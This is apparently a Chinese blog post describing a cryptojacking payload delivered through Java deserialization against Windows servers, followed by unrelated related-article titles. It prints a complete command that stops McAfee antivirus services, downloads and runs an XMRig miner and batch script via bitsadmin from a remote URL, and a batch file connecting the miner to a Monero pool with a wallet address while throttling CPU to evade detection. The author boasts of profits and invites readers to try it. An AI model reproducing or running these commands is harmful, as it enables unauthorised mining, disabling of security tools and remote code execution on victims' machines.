最近,安全社区中有很多人都在讨论如何利用Java反序列化漏洞来攻击类似Apache、SOLR和WebLogic之类的系统。不说废话,我们直接进入正题。目前绝大多数的此类攻击针对的都是Linux/Unix系统,但是我近期发现了一种针对Windows系统的攻击方法。

PS:本文仅用于技术讨论与分享,严禁用于非法用途

攻击代码如下:

cmd/cnet stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;

实际的Payload分析

关闭McAfee反病毒软件(我不明白社区中的这种技术为啥只关掉McAfee…):

netstop "McAfee McShield;netstop mcafeeframework;

使用bitsadmin从GitHub下载加密货币挖矿程序和一个batch脚本文件:

bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dirxmrig*;xmrig.bat;tasklist;

Batch脚本文件代码如下:

taskkill/im /f xmrig.exe /tnetstop "McAfee McShield"netstop mcafeeframeworkxmrig.exe-o http://monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1

首先,上述代码会终止其他xmrig进程(可能是为了防止资源竞争)。接下来,它会关闭McAfee。然后便会开启挖矿程序,并跟http://monerohash.com矿池(端口3333)进行连接。它只会占用大约50%的CPU资源,估计是为了避免被检测到吧。

目前为止,这个挖矿程序的计算能力只能实现350哈希每秒,并为我挖到了40个门罗币(价值约为7000美元)。

感兴趣的同学可以自己动手试一试,说不定会有一些意想不到的收获。

利用Java反序列化漏洞在Windows上的挖矿实验相关推荐

  1. java反序列化漏洞POP查找_利用 Java 反序列化漏洞在受限环境下获取反向 Shell

    原标题:利用 Java 反序列化漏洞在受限环境下获取反向 Shell 原文链接: https://medium.com/abn-amro-red-team/java-deserialization-f ...

  2. Java反序列化漏洞通用利用分析

    2015年11月6日,FoxGlove Security安全团队的@breenmachine 发布的一篇博客[3]中介绍了如何利用Java反序列化漏洞,来攻击最新版的WebLogic.WebSpher ...

  3. Lib之过?Java反序列化漏洞通用利用分析

    1 背景 2015年11月6日,FoxGlove Security安全团队的@breenmachine 发布的一篇博客[3]中介绍了如何利用Java反序列化漏洞,来***最新版的WebLogic.We ...

  4. java反序列化漏洞 poc_Java反序列化漏洞详解

    Java反序列化漏洞从爆出到现在快2个月了,已有白帽子实现了jenkins,weblogic,jboss等的代码执行利用工具.本文对于Java反序列化的漏洞简述后,并对于Java反序列化的Poc进行详 ...

  5. java反序列化漏洞挖掘

    java反序列化漏洞挖掘 1.漏洞触发场景 在java编写的web应用与web服务器间java通常会发送大量的序列化对象例如以下场景: 1)HTTP请求中的参数,cookies以及Parameters ...

  6. java反序列化漏洞分析

    Java反序列化漏洞(Java Deserialization Vulnerabilities)是一种常见的安全漏洞,其攻击方式是利用Java中的序列化和反序列化机制,通过在序列化数据中插入恶意代码, ...

  7. java 反序列化漏洞 利用思路简介

    目录 序列化的过程 readObject方法 反射链 完成反序列漏洞实践 结论 之前听别人讲解反序列化的漏洞听的晕乎乎的,刚脆就趁着周末研究一下反序列化漏洞,并且搭建实战环境实际操作了一把,明白了之后 ...

  8. 深入理解JNDI注入与Java反序列化漏洞利用

    rmi 和 jndi 这些概念,一直接触,但是看了会儿 还是略微懵逼,这篇文章 暂时理清了我的思路 [承上启下]----------------------------------上边属于我自己瞎扯的 ...

  9. 6-java安全——java反序列化漏洞利用链

    本篇将结合一个apache commons-collections组件来学习java反序列化漏洞原理,以及如何构造利用链. 我们知道序列化操作主要是由ObjectOutputStream类的 writ ...

最新文章

  1. php查找多个字符串替换,php 替换多个字符串
  2. MIT 的新型开源系统 Taco 将数据分析速度提升 100 倍 !(附论文)
  3. 分分钟搭建Oracle环境
  4. C++ exception 类继承结构图
  5. javascript --- 函数的柯里化 Vue 2.x中柯里化的使用
  6. android生成aar无效,android studio生成aar包并在其他工程引用aar包的方法
  7. python server酱_Python使用微信收取通知
  8. python的装饰器很有用吗_你真的了解python装饰器么
  9. PHP json_encode中文乱码解决方法
  10. Word字体修改(罚抄,抄作业专用)
  11. 《图谋职场——最经济的图形沟通》 一种能提高职场竞争力的沟通能力
  12. 易用宝项目记录day3-curd
  13. 商业计划书PPT模板
  14. Linux 2038年问题
  15. 计算机无法安装VC2015,VC++2015安装失败怎么办 VS2015安装失败解决方法
  16. sprd 11 播放视频时开启录屏,视频闪烁或提示正在加载问题
  17. 针对云主机卡死问题的定位分析方法
  18. Unity 如何写一个足球运动员AI(一)
  19. 技术一般的程序员找工作,如今真的一年比一年难...
  20. [CQOI2009]循环赛[HNOI2013]比赛

热门文章

  1. echarts绘制各种图表(柱形、折线、柱形、饼图、南丁格尔、环形、中国地图散点图、百度地图散点图、词云图)
  2. 小孔成像总结_初中生必看:中考物理解题技巧+方法总结!
  3. 文科生学python_一个文科生的python心路历程
  4. signature=3cb79ad68e1de6fcae23aede975d0e4e,考研二外法语易错题汇总
  5. 校园 爆料 开怀一笑
  6. 破茧成蝶——我的北大之路(文/贺舒婷)
  7. IP分片(一)【羊羊洒洒的Blog】
  8. 全面了解三极管——三极管基本参数1
  9. power supply frameware 框架
  10. 【剑指 Java】第 1 弹:靠这份 Java 基础知识总结,我拿到了满意的 Offer